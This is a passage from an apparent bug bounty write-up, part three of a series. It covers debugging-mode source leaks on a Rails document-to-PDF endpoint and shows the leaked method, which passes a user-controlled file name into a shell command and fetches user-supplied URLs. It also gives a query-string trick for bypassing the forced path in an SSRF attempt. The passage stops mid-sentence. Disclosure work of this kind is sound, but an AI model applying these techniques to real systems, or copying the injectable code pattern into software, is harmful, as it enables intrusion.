Basic recon to RCE III

For the 3rd and I think last episode of the series, we’re going to continue with the same target as the episode 2, that I recommend you to go and see at first to put you a bit more in the context : Basic recon to RCE II

The Story

So, after this first RCE discovered on the application, I wanted to continue to dig, especially because this debug mode displays a POST method on the endpoint /convertdoctopdf. So I immediately thought about a SSRF and as it’s a bug that I like quite a lot, I wanted to dig it.

Another advantage of the debug mode (on Rails and maybe with other frameworks) is that if the application raises an exception, it will show you the part of the source code concerned in the response, which is pretty handy when you don’t know which parameter you should use !

After a first POST request without body, the application displays an error 500 with the piece of code that concerns the error, which tells us that the SessionId parameter is missing. I spare you the details but this technique allowed me to obtain the complete code of the method :

def convertdoctopdf
  header = {'Content-Type' =>'application/json','Authorization' => 'OAuth '+params['SessionId']}
  id = params['AttachmentId']
  baseURL = params['Url']
  fileName = params['FileName'] ? params['FileName']+(Time.now.to_i).to_s : 'fileconvert'+(Time.now.to_i).to_s
  uri = URI.parse(baseURL+"/services/data/v44.0/sobjects/Attachment/"+id+"/Body")
  
  https = Net::HTTP.new(uri.host,uri.port)
  https.use_ssl = true
  req = Net::HTTP::Get.new(uri.path, header)
  attachment = https.request(req)

  File.open("#{Rails.root}/public/#{fileName+'.docx'}", 'wb') { |f| f.write(attachment.body) }
  %x(/usr/bin/soffice --headless --convert-to pdf --outdir  "#{Rails.root}/public/file_conversion/" "#{Rails.root}/public/#{fileName+'.docx'}")

  outputfileBase64 = Base64.encode64(open("#{Rails.root}/public/file_conversion/#{fileName}.pdf").to_a.join);
 
  File.delete("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}") if File.exist?("#{Rails.root}/public/file_conversion/#{fileName+'.pdf'}")
  File.delete("#{Rails.root}/public/#{fileName+'.docx'}") if File.exist?("#{Rails.root}/public/#{fileName+'.docx'}")
 
  render json: {file: outputfileBase64}, status: :created, location: "Done"
end

Which can be described as follows:

• header = Expects the SessionID parameter but is not important here, you can put anything
• id = Waits for the AttachmentId parameter but is not important either, you can put anything too
• baseUrl = Waits for the url parameter, just enter a valid URL
• fileName = There is a ternary condition that makes it an optional parameter
• Then a GET request is made, the content is saved to a file, converted to PDF and displayed to the user in base64

I had first stopped after leaking the HTTP request line thinking that was all I needed to trigger my SSRF. Except:

• A GET request is made on the URL + path /services/data/v44.0/sobjects/Attachment/"+id+"/Body" but that can be easily bypassed by specifying a URL of type https://domain.tld/?x=, the path will then be forced as the parameter value.
  • The URL will become: https://domain.tld/?x=/services/data/v44.0/sobjects/Attachment/"+id+"/Body"
• https.use_ssl = true which is the blocking point because it forces the use of HTTPS

Going back to our source code, I was saying that the body of the response is saved in a file (with the extension docx but in fact it doesn’t matter, it’s not a real docx but rather a simple text file) and then the soffice binary is called and converts this file into a PDF and displays the content of the PDF in base64 in the response. Something I didn’t know yet because I was too focused on the SSRF and I could see in the return of my request in the answer and I didn’t try to understand the cause.

I spent a few hours on the SSRF without being able to exploit it because :

• The use of HTTPS prevents me from typing on internal URLs such as http://127.0.0.1
• The target must have a valid certificate
• For some reason I couldn’t query a target using a let’s encrypt certificate…

Anyway, after these blocking points, to try to inject some code in my PDF I used a Github repository on which I uploaded my PoC then I used the RAW URL (like https://raw.githubusercontent.com/user/poc/master/poc.html) to inject the content in the PDF. Unfortunately after many tries, the only tag that seemed to be interpreted was the